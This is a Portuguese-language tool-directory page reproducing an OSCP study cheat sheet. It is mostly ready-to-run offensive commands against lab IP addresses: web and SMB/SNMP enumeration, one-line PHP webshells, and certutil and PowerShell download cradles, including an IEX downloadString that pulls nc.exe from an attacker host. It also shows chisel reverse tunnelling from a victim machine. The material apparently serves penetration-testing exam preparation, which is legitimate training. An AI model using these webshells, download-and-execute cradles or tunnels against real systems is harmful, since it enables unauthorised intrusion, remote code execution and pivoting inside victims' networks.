Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
OSCP — OSCP Guia de Estudo | Kitploit
Ferramentas/GitHubGitHub/rootsecdev/oscp
ReconhecimentoExploraçãoExploração de Aplicações WebPós-ExploraçãoSegurança WebSegurança de RedeTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubrootsecdev/oscp

OSCP

OSCP Guia de Estudo

4251há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
Compartilhar

OSCP

Guia de Estudo OSCP

Índice

Enumeração e Reconhecimento

Enumeração Web

Varredura com Nikto:

root@kitploit:~
nikto -h http://10.10.10.1

Descoberta de diretórios com diferentes ferramentas:

DIRB

root@kitploit:~
dirb http://10.10.10.1

Gobuster

root@kitploit:~
gobuster dir -u http://10.129.155.74:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx

Pentest em Aplicações Web

Payloads XSS: Referência rápida: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection

Teste básico de formulário XSS com listener netcat ou servidor web python

root@kitploit:~

Cross-site scripting para extrair cookies em base64. Certifique-se de codificar a URL no Burp com ctrl + u

root@kitploit:~

Webshells

Referência: https://sushant747.gitbooks.io/total-oscp-guide/content/webshell.html

Webshell PHP simples para execução de comandos

root@kitploit:~
<?php system($_REQUEST ['cmd']) ?>
root@kitploit:~
<?php system($_GET['cmd']); ?>

Pentest SNMP

Porta 161 UDP

root@kitploit:~
snmpwalk -c public -v2c 10.129.213.210
root@kitploit:~
snmp-check 10.129.213.210

Pentest SMB

root@kitploit:~
crackmapexec smb 10.129.70.254 

Detectar compartilhamentos anônimos abertos

root@kitploit:~
smbclient -L //10.129.70.254

Autenticação nula

root@kitploit:~
smbclient -N -L //10.129.70.254

Pós-Exploração

Download e Transferência de Arquivos

Certutil:

root@kitploit:~
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

PowerShell:

root@kitploit:~
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
root@kitploit:~
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.11.0.4/nc.exe')"

Encaminhamento de Portas e Tunelamento

Usando Chisel:

Exemplo usando encaminhamento de porta para que a porta 910 fique disponível na máquina Kali

root@kitploit:~
on victim machine setup port forwarding
chisel.exe client 10.10.16.10:5555 R:910:127.0.0.1:910
root@kitploit:~
On Kali attack box setup a reverse listner for port forward with chisel
./chisel server --port 5555 --reverse
Baixar ferramenta